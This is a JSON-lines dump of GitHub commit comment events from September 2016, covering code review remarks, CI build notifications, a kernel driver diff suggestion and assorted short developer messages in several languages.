{"id":"4526996112","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18926740,"position":null,"line":null,"path":null,"commit_id":"60a6253143b2d0f345735a8d7701596f250d3c4c","created_at":"2016-09-07T11:20:43Z","updated_at":"2016-09-07T11:20:43Z","body":"Such as what?"}},"created_at":"2016-09-07T11:20:43Z"}
{"id":"4527004617","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"lollypop27/bookingz"},"payload":{"comment":{"id":18926759,"position":5,"line":85,"path":"config/locales/devise.en.yml","commit_id":"30aa023d0ecf5b637d1925044c79da4a291938ee","created_at":"2016-09-07T11:22:39Z","updated_at":"2016-09-07T11:22:39Z","body":"Pluralize 'error'?"}},"created_at":"2016-09-07T11:22:39Z"}
{"id":"4527009210","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926772,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T11:23:40Z","updated_at":"2016-09-07T11:23:40Z","body":"TeamCity Ms Demo :: Build [Build 34](http://10.22.17.95:8111/viewLog.html?buildId=59&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T11:23:40Z"}
{"id":"4527009796","type":"CommitCommentEvent","actor":{"login":"The-DarkBeast"},"repo":{"name":"The-DarkBeast/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":18926773,"position":null,"line":null,"path":null,"commit_id":"545d829744c446b2783870bbf28fb135d77f572f","created_at":"2016-09-07T11:23:47Z","updated_at":"2016-09-07T11:23:47Z","body":"Thnx Shoaib it worked 🙂"}},"created_at":"2016-09-07T11:23:47Z"}
{"id":"4527011200","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/libdroidjni"},"payload":{"comment":{"id":18926779,"position":12,"line":148,"path":"AudioTrack.cpp","commit_id":"916b2efab7fe0962b13f7158500d435ffaf853ad","created_at":"2016-09-07T11:24:09Z","updated_at":"2016-09-07T11:24:09Z","body":"Apparently ;)\r\nhttps://github.com/koying/libdroidjni/commit/0e442eddbbff7943eb6e2b2656ea6b7e94f1101a\r\n\r\nI always wondered why it didn't actually block, that might be it :)"}},"created_at":"2016-09-07T11:24:09Z"}
{"id":"4527012652","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926782,"position":null,"line":null,"path":null,"commit_id":"0d1cea1a9df60b26925a2c0e67f3c5ff786338a3","created_at":"2016-09-07T11:24:29Z","updated_at":"2016-09-07T11:24:29Z","body":"TeamCity Ms Demo :: Build [Build 34](http://10.22.17.95:8111/viewLog.html?buildId=59&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:00:50"}},"created_at":"2016-09-07T11:24:29Z"}
{"id":"4527015631","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18926788,"position":null,"line":null,"path":null,"commit_id":"38a0b0f79d1698c6cefc06625db923ca196e0c7d","created_at":"2016-09-07T11:25:09Z","updated_at":"2016-09-07T11:25:09Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-133/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-07T11:25:09Z"}
{"id":"4527016848","type":"CommitCommentEvent","actor":{"login":"ksooo"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18926792,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T11:25:22Z","updated_at":"2016-09-07T11:25:22Z","body":"> can you please try wsnipex@d9e5024\r\n\r\nThis works of course as the crashing line is no longer executed (if not LINUX). ;-)"}},"created_at":"2016-09-07T11:25:22Z"}
{"id":"4527018348","type":"CommitCommentEvent","actor":{"login":"bobmcwhirter"},"repo":{"name":"wildfly-swarm/wildfly-swarm"},"payload":{"comment":{"id":18926793,"position":null,"line":null,"path":null,"commit_id":"fddcc828826aa000e9eaf18033ea54c34c71eb3b","created_at":"2016-09-07T11:25:44Z","updated_at":"2016-09-07T11:25:44Z","body":"Not quite done with it yet. Will continue to improve.\n\nOn Wednesday, September 7, 2016, Heiko Braun <notifications@github.com>\nwrote:\n\n> Thanks bob, thats useful\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/wildfly-swarm/wildfly-swarm/commit/fddcc828826aa000e9eaf18033ea54c34c71eb3b#commitcomment-18923234>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAA-T5BNwXuC9CTukF3vKOq4qcUUojY1ks5qnkzKgaJpZM4J2jNc>\n> .\n>\n"}},"created_at":"2016-09-07T11:25:44Z"}
{"id":"4527018784","type":"CommitCommentEvent","actor":{"login":"julen"},"repo":{"name":"ta2-1/pootle"},"payload":{"comment":{"id":18926795,"position":null,"line":null,"path":null,"commit_id":"244143325a7408cdca94ffd81148bd812f5fe46e","created_at":"2016-09-07T11:25:52Z","updated_at":"2016-09-07T11:25:52Z","body":">>    Which problem does this specifically fix? How can I validate that?\r\n>\r\n>@julen there is a mockup from @iafan here https://github.com/translate/pootle/issues/4976#issuecomment-235778481\r\n> The goal of this issue is to follow the mockup.\r\n\r\nAnd how does the _error_ class/name relate to anything in this regards? I would be happy to validate this."}},"created_at":"2016-09-07T11:25:52Z"}
{"id":"4527022167","type":"CommitCommentEvent","actor":{"login":"ta2-1"},"repo":{"name":"ta2-1/pootle"},"payload":{"comment":{"id":18926801,"position":null,"line":null,"path":null,"commit_id":"244143325a7408cdca94ffd81148bd812f5fe46e","created_at":"2016-09-07T11:26:35Z","updated_at":"2016-09-07T11:26:35Z","body":"@julen sorry I misunderstood. \r\n![image](https://cloud.githubusercontent.com/assets/682845/18310439/112c8ec0-7507-11e6-8190-e44509138dd5.png)\r\n"}},"created_at":"2016-09-07T11:26:35Z"}
{"id":"4527023372","type":"CommitCommentEvent","actor":{"login":"kpxp"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18926804,"position":null,"line":null,"path":null,"commit_id":"2b6346ee1e2bbd427976def82aacd43293a07010","created_at":"2016-09-07T11:26:51Z","updated_at":"2016-09-07T11:26:51Z","body":"@luiges90 耒大，我重装系统后有些方案打不开啊"}},"created_at":"2016-09-07T11:26:51Z"}
{"id":"4527023628","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18926805,"position":null,"line":null,"path":null,"commit_id":"772fea05998847b2e1c25ead46ef01332c506b96","created_at":"2016-09-07T11:26:54Z","updated_at":"2016-09-07T11:26:54Z","body":"Yeah, I didn't remove it because I thought that might affect caching if IDE adds -D display-details for some requests but not for others."}},"created_at":"2016-09-07T11:26:54Z"}
{"id":"4527027943","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18926814,"position":10,"line":9,"path":"js/product.js","commit_id":"dcc6dffffca6fecbfc6a198252e4d57d3485a87a","created_at":"2016-09-07T11:27:48Z","updated_at":"2016-09-07T11:27:48Z","body":"please use\r\n```js\r\nhasClass(element, className);\r\n```\r\nit's more general. \r\nOne more: move it to the outer scope. Don't forget about `var`."}},"created_at":"2016-09-07T11:27:48Z"}
{"id":"4527031848","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/packages-core"},"payload":{"comment":{"id":18926824,"position":null,"line":null,"path":null,"commit_id":"0b324a35261244e3ab653a613bb1e54a1004e763","created_at":"2016-09-07T11:28:39Z","updated_at":"2016-09-07T11:28:39Z","body":"If you plan to remove the dbus-x11 at some point, please notify me before you do.\r\ndbus-openrc now depends on it, so I'd adopt it in openrc repo."}},"created_at":"2016-09-07T11:28:39Z"}
{"id":"4527035555","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18926834,"position":15,"line":14,"path":"js/product.js","commit_id":"dcc6dffffca6fecbfc6a198252e4d57d3485a87a","created_at":"2016-09-07T11:29:30Z","updated_at":"2016-09-07T11:29:30Z","body":"what if `NaN` is returned from `parseInt`? for example `parseInt('AAAA')`"}},"created_at":"2016-09-07T11:29:30Z"}
{"id":"4527036586","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18926839,"position":null,"line":null,"path":null,"commit_id":"60a6253143b2d0f345735a8d7701596f250d3c4c","created_at":"2016-09-07T11:29:44Z","updated_at":"2016-09-07T11:29:44Z","body":"Hmm, the HP value when holding down ALT, the details on the talent window. It feels more like a debug mode. I mean don't get me wrong, I'm totally going to use it myself."}},"created_at":"2016-09-07T11:29:44Z"}
{"id":"4527046763","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926866,"position":72,"line":361,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:32:03Z","updated_at":"2016-09-07T11:32:03Z","body":"Default keyword arguments in python should never be a mutable data type. The best option is to always use `None`, and then set the default value in the function body."}},"created_at":"2016-09-07T11:32:03Z"}
{"id":"4527047206","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926869,"position":null,"line":null,"path":null,"commit_id":"ca5b674ad18485edf75331b8318ccc49d2d2f32c","created_at":"2016-09-07T11:32:10Z","updated_at":"2016-09-07T11:32:10Z","body":"TeamCity Ms Demo :: Build [Build 35](http://10.22.17.95:8111/viewLog.html?buildId=60&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T11:32:10Z"}
{"id":"4527048285","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926871,"position":49,"line":346,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:32:24Z","updated_at":"2016-09-07T11:32:24Z","body":"This method of iteration is preferred to using indices."}},"created_at":"2016-09-07T11:32:24Z"}
{"id":"4527048363","type":"CommitCommentEvent","actor":{"login":"JWGmeligMeyling"},"repo":{"name":"Blazebit/blaze-persistence"},"payload":{"comment":{"id":18926872,"position":null,"line":null,"path":null,"commit_id":"49203b7675a5a9f58996c91ca341a0d1b8306fb5","created_at":"2016-09-07T11:32:25Z","updated_at":"2016-09-07T11:32:25Z","body":"Thanks for the information! Going to try this out 😄 "}},"created_at":"2016-09-07T11:32:25Z"}
{"id":"4527048719","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18926873,"position":49,"line":88,"path":"js/product.js","commit_id":"4444edc7acceb67936bcf066dd7492f3c4910e12","created_at":"2016-09-07T11:32:30Z","updated_at":"2016-09-07T11:32:30Z","body":"you can simply use `{}`"}},"created_at":"2016-09-07T11:32:30Z"}
{"id":"4527050029","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18926875,"position":null,"line":null,"path":null,"commit_id":"ca5b674ad18485edf75331b8318ccc49d2d2f32c","created_at":"2016-09-07T11:32:49Z","updated_at":"2016-09-07T11:32:49Z","body":"TeamCity Ms Demo :: Build [Build 35](http://10.22.17.95:8111/viewLog.html?buildId=60&buildTypeId=MsDemo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 3 Build time: 00:00:40\n### Failed tests\n```\ncom.epam.clientprofolio.dao.ClientProfolioDaoTest.shouldGetClientProfolioById: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T11:32:49Z"}
{"id":"4527050834","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926879,"position":33,"line":318,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:33:00Z","updated_at":"2016-09-07T11:33:00Z","body":"Exception types should be explicit where possible."}},"created_at":"2016-09-07T11:33:00Z"}
{"id":"4527052942","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926884,"position":6,"line":286,"path":"src/bql.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:33:31Z","updated_at":"2016-09-07T11:33:31Z","body":"Need to check if the user specified a table which exists, otherwise `guess.guess_to_schema` fails incomprehensibly."}},"created_at":"2016-09-07T11:33:31Z"}
{"id":"4527058156","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926895,"position":11,"line":296,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:34:44Z","updated_at":"2016-09-07T11:34:44Z","body":"variable and function names, etc, in comments are referenced with backticks `."}},"created_at":"2016-09-07T11:34:44Z"}
{"id":"4527059211","type":"CommitCommentEvent","actor":{"login":"stucki"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18926898,"position":null,"line":null,"path":null,"commit_id":"74082d8ac000cb2c0a1c3fa8d16d3e2a39d415fa","created_at":"2016-09-07T11:35:00Z","updated_at":"2016-09-07T11:35:00Z","body":"This will now skip code which was in place before. I'm not sure if it's the right way to fix this."}},"created_at":"2016-09-07T11:35:00Z"}
{"id":"4527062095","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926904,"position":123,"line":420,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:35:38Z","updated_at":"2016-09-07T11:35:38Z","body":"Using a triple string here is not the right option, because we are printing to the console. A trip string preservers the spacing as it appears in the original source code, making the warning very hard to read in the console."}},"created_at":"2016-09-07T11:35:38Z"}
{"id":"4527063118","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18926905,"position":44,"line":84,"path":"js/product.js","commit_id":"4444edc7acceb67936bcf066dd7492f3c4910e12","created_at":"2016-09-07T11:35:53Z","updated_at":"2016-09-07T11:35:53Z","body":"```js\r\nvar App = {\r\n  DB: {},\r\n  init: function() {\r\n     ...\r\n     App.render();\r\n  },\r\n  render: function() {},\r\n};\r\n```"}},"created_at":"2016-09-07T11:35:53Z"}
{"id":"4527066440","type":"CommitCommentEvent","actor":{"login":"ilevkivskyi"},"repo":{"name":"ilevkivskyi/peps"},"payload":{"comment":{"id":18926910,"position":null,"line":null,"path":null,"commit_id":"c69984790bd20fb4e164cb8efd0be36d0fcf65f3","created_at":"2016-09-07T11:36:38Z","updated_at":"2016-09-07T11:36:38Z","body":"@ncoghlan \r\n> I like this outline, although it's going to take quite a while to fill in :)\r\n\r\nThanks, Nick! I added your suggestions plus some other ideas.\r\nIndeed, the plan is quite ambitious, but I think there is no hurry with this PEP, I think we could finish it by 3.6.0final"}},"created_at":"2016-09-07T11:36:38Z"}
{"id":"4527066551","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926911,"position":156,"line":474,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:36:40Z","updated_at":"2016-09-07T11:36:40Z","body":"The variable `i` was used in this `for` loop, but was never defined anywhere. Using `enumerate` associates each item with its index."}},"created_at":"2016-09-07T11:36:40Z"}
{"id":"4527066752","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"kjdev/php-ext-lz4"},"payload":{"comment":{"id":18926914,"position":16,"line":65,"path":"lz4.c","commit_id":"c9984c5d3a8c1930c5f2c976619ffe7ede944dfc","created_at":"2016-09-07T11:36:43Z","updated_at":"2016-09-07T11:36:43Z","body":"seems a typo, should probably be HAVE_LIBLZ4"}},"created_at":"2016-09-07T11:36:43Z"}
{"id":"4527067149","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926917,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T11:36:49Z","updated_at":"2016-09-07T11:36:49Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T11:36:49Z"}
{"id":"4527068154","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926923,"position":137,"line":429,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:37:04Z","updated_at":"2016-09-07T11:37:04Z","body":"When iterating over tuples, just iterate over them directly rather than unbox them in the body of the of loop."}},"created_at":"2016-09-07T11:37:04Z"}
{"id":"4527068255","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926924,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T11:37:06Z","updated_at":"2016-09-07T11:37:06Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T11:37:06Z"}
{"id":"4527069255","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"kjdev/php-ext-lz4"},"payload":{"comment":{"id":18926928,"position":null,"line":null,"path":null,"commit_id":"c9984c5d3a8c1930c5f2c976619ffe7ede944dfc","created_at":"2016-09-07T11:37:19Z","updated_at":"2016-09-07T11:37:19Z","body":"Thanks for taking care of this :)\r\n(it was on my TODO list after snappy)\r\n"}},"created_at":"2016-09-07T11:37:19Z"}
{"id":"4527070479","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18926934,"position":14,"line":95,"path":"tests/protractor/e2e/send-message.js","commit_id":"4d5eea062b1a5c934884bb06042f3db77728d733","created_at":"2016-09-07T11:37:37Z","updated_at":"2016-09-07T11:37:37Z","body":"Turns out this wasn't needed! I'm guessing it was at some point when I was building it but it's not now."}},"created_at":"2016-09-07T11:37:37Z"}
{"id":"4527070984","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18926937,"position":146,"line":466,"path":"src/guess.py","commit_id":"e35cc06c5ffbbacd237a13a400bc8f29665ac0e3","created_at":"2016-09-07T11:37:42Z","updated_at":"2016-09-07T11:37:42Z","body":"There was an extra space here, so the semicolon was not being removed in the command `schema = schema[:,-2]`."}},"created_at":"2016-09-07T11:37:42Z"}
{"id":"4527072012","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18926940,"position":8,"line":160,"path":"tests/protractor/utils.js","commit_id":"922e3eb28497b244cd9116c83448e961c7feec18","created_at":"2016-09-07T11:37:55Z","updated_at":"2016-09-07T11:37:55Z","body":"The next commit deletes this"}},"created_at":"2016-09-07T11:37:55Z"}
{"id":"4527072872","type":"CommitCommentEvent","actor":{"login":"stucki"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18926942,"position":null,"line":null,"path":null,"commit_id":"74082d8ac000cb2c0a1c3fa8d16d3e2a39d415fa","created_at":"2016-09-07T11:38:07Z","updated_at":"2016-09-07T11:38:07Z","body":"Here's my proposal instead:\r\n\r\n```\r\ndiff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c\r\nindex f74b22d..e90d17d 100755\r\n--- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c\r\n+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c\r\n@@ -156,6 +156,7 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,\r\n                                }\r\n                        }\r\n                } else if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC_DW9800W) {\r\n+#ifdef CONFIG_VEGETALTE_COMMON\r\n                        if(macro_code <= inf_code)\r\n                        {\r\n                                pr_err(\"ERROR ! af:macro_code:%d,inf_code:%d\\n\", macro_code,inf_code);\r\n@@ -166,9 +167,10 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,\r\n                                macro_code = 1023 - macro_adj_otp;\r\n                        }\r\n                        pos_value = (next_lens_position*((macro_code+macro_adj_otp)-(inf_code-inf_adj_otp))/1024+(inf_code-inf_adj_otp));\r\n-               \r\n-\r\n                         value = (pos_value <<\r\n+#else\r\n+                        value = (next_lens_position <<\r\n+#endif\r\n                                 write_arr[i].data_shift) |\r\n                                 ((hw_dword & write_arr[i].hw_mask) >>\r\n                                 write_arr[i].hw_shift);\r\n```"}},"created_at":"2016-09-07T11:38:07Z"}
{"id":"4527077236","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18926959,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T11:39:10Z","updated_at":"2016-09-07T11:39:10Z","body":"![Szeptember 7. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1473152574)\nErdei gombakrémleves\r\nMustáros sertéstarja újhagymás törtburgonyával\r\nMeggyes-mákos házi rétes"}},"created_at":"2016-09-07T11:39:10Z"}
{"id":"4527078408","type":"CommitCommentEvent","actor":{"login":"Yaco"},"repo":{"name":"ualalasocial/ualalasocial.github.io"},"payload":{"comment":{"id":18926963,"position":null,"line":null,"path":null,"commit_id":"acfe84f555bf1e5fd0659c1be48e0a95e4b222a0","created_at":"2016-09-07T11:39:24Z","updated_at":"2016-09-07T11:39:24Z","body":"Acuerdo con cambiar el titulo de la sección a \"breve reseña histórica\". Lo del articulo no lo pondria acá, sino en una sección de publicaciones. Desca acá se podria linkear.\r\n\r\nDefinitivamente hay algo mal en la linea 29..."}},"created_at":"2016-09-07T11:39:24Z"}
{"id":"4527089719","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18926987,"position":13,"line":27,"path":"js/product.js","commit_id":"4444edc7acceb67936bcf066dd7492f3c4910e12","created_at":"2016-09-07T11:41:58Z","updated_at":"2016-09-07T11:41:58Z","body":"```js\r\nvar Cart = {\r\n   _items = [] | {},\r\n   addItem: function(productId, count) {},\r\n   removeItem: function(productId) {},\r\n};\r\n\r\n```"}},"created_at":"2016-09-07T11:41:58Z"}
{"id":"4527090087","type":"CommitCommentEvent","actor":{"login":"sreekanthsnair"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":18926988,"position":17,"line":99,"path":"egov/egov-ptis/src/main/java/org/egov/ptis/domain/bill/PropertyTaxBillable.java","commit_id":"9cb28f00e0e03c502692e6b1db8b3bd02d384dfe","created_at":"2016-09-07T11:42:04Z","updated_at":"2016-09-07T11:42:04Z","body":"Can someone work on making AbstractBillable threadsafe for singleton use @ramakrishnaippili @katararishi @satyamashish ? If it can't be changed to singleton then do not make the extending class as spring service bean."}},"created_at":"2016-09-07T11:42:04Z"}
{"id":"4527091819","type":"CommitCommentEvent","actor":{"login":"Yaco"},"repo":{"name":"ualalasocial/ualalasocial.github.io"},"payload":{"comment":{"id":18926993,"position":null,"line":null,"path":null,"commit_id":"4326a3c7170398ec863a8d05b41bd776c990aec0","created_at":"2016-09-07T11:42:25Z","updated_at":"2016-09-07T11:42:25Z","body":":-1: \r\nNo son \"las\" redes sociales, hay muchas otras. Por eso sugiero \"algunas/varias/estas\""}},"created_at":"2016-09-07T11:42:25Z"}
{"id":"4527092204","type":"CommitCommentEvent","actor":{"login":"sreekanthsnair"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":18926995,"position":null,"line":null,"path":null,"commit_id":"9cb28f00e0e03c502692e6b1db8b3bd02d384dfe","created_at":"2016-09-07T11:42:31Z","updated_at":"2016-09-07T11:42:31Z","body":"Great work :+1: "}},"created_at":"2016-09-07T11:42:31Z"}
{"id":"4527099390","type":"CommitCommentEvent","actor":{"login":"Kimbleed"},"repo":{"name":"Kimbleed/hello-world"},"payload":{"comment":{"id":18927017,"position":null,"line":null,"path":null,"commit_id":"c474523cdfb2b87487bc7a36f35e7774593ba65c","created_at":"2016-09-07T11:44:14Z","updated_at":"2016-09-07T11:44:14Z","body":"d"}},"created_at":"2016-09-07T11:44:14Z"}
{"id":"4527100313","type":"CommitCommentEvent","actor":{"login":"Yaco"},"repo":{"name":"ualalasocial/ualalasocial.github.io"},"payload":{"comment":{"id":18927020,"position":null,"line":null,"path":null,"commit_id":"dc0a3dda0278f35457a435eb26118a77a7a73f40","created_at":"2016-09-07T11:44:26Z","updated_at":"2016-09-07T11:44:26Z","body":"Siempre renombrar las imagenes con la fecha del post en que las vas a usar. No poner \"redimensionado\" como parte del nombre."}},"created_at":"2016-09-07T11:44:26Z"}
{"id":"4527108471","type":"CommitCommentEvent","actor":{"login":"silver13"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18927036,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-07T11:46:25Z","updated_at":"2016-09-07T11:46:25Z","body":"the app is nrf connect, you have to press scan. The quad is visible anytime  after gyro calibration, so 4 seconds after powerup, or longer, it will be on. Make sure the BLE beacon is enabled."}},"created_at":"2016-09-07T11:46:25Z"}
{"id":"4527109732","type":"CommitCommentEvent","actor":{"login":"Yaco"},"repo":{"name":"ualalasocial/ualalasocial.github.io"},"payload":{"comment":{"id":18927039,"position":null,"line":null,"path":null,"commit_id":"82bcaa3865379ac04986305408c807943f29c74c","created_at":"2016-09-07T11:46:43Z","updated_at":"2016-09-07T11:46:43Z","body":"El valor deberia ser ```published: false```"}},"created_at":"2016-09-07T11:46:43Z"}
{"id":"4527110899","type":"CommitCommentEvent","actor":{"login":"bibekthapa"},"repo":{"name":"bibekthapa/dosterminal"},"payload":{"comment":{"id":18927044,"position":null,"line":null,"path":null,"commit_id":"a524584c73282f675fd661de07f02eca2ddb7ed6","created_at":"2016-09-07T11:46:59Z","updated_at":"2016-09-07T11:46:59Z","body":"Adding the split will help to split the input command with the space. i.e   \" \"\r\ndir fas\r\n\r\nthis will give o/p as The cmd is dir"}},"created_at":"2016-09-07T11:46:59Z"}
{"id":"4527111339","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18927045,"position":4,"line":13,"path":"application/src/main/java/org/exoplatform/chat/portlet/chat/assets/base.less","commit_id":"316726f1da0ffd62c170767ad87394e294fb6397","created_at":"2016-09-07T11:47:05Z","updated_at":"2016-09-07T11:47:05Z","body":"Shoudn't we increase the dropdown width instead of changing the font-size ?"}},"created_at":"2016-09-07T11:47:05Z"}
{"id":"4527111948","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18927047,"position":31,"line":35,"path":"js/product.js","commit_id":"4444edc7acceb67936bcf066dd7492f3c4910e12","created_at":"2016-09-07T11:47:14Z","updated_at":"2016-09-07T11:47:14Z","body":"```js\r\nObject.keys(itemsInCart).length\r\n```"}},"created_at":"2016-09-07T11:47:14Z"}
{"id":"4527116350","type":"CommitCommentEvent","actor":{"login":"nertzy"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18927051,"position":5,"line":35,"path":"modules/@angular/compiler/test/schema/dom_element_schema_registry_spec.ts","commit_id":"d309f7799c12a0b6ac70b64552da2bd2ee9ff872","created_at":"2016-09-07T11:48:15Z","updated_at":"2016-09-07T11:48:15Z","body":"What does \"missing from chrome\" mean here?\r\n\r\nChrome has full support for the <summary> tag, for example. Note that the <summary> tag is always supposed to be found inside of a <details> tag.\r\n\r\nI want to caution against making a distinction between these tags and the \"regular elements\" list below. These are all \"regular elements\".\r\n\r\nBut that's just my two cents. Thanks!"}},"created_at":"2016-09-07T11:48:15Z"}
{"id":"4527123695","type":"CommitCommentEvent","actor":{"login":"crazymaster"},"repo":{"name":"vim-jp/lang-ja"},"payload":{"comment":{"id":18927059,"position":null,"line":null,"path":null,"commit_id":"e179d479752dda5bea48c727c530d688cb7f27d6","created_at":"2016-09-07T11:49:59Z","updated_at":"2016-09-07T11:49:59Z","body":"一応Cのコード入ってましたか...\r\npush -f して消します"}},"created_at":"2016-09-07T11:49:59Z"}
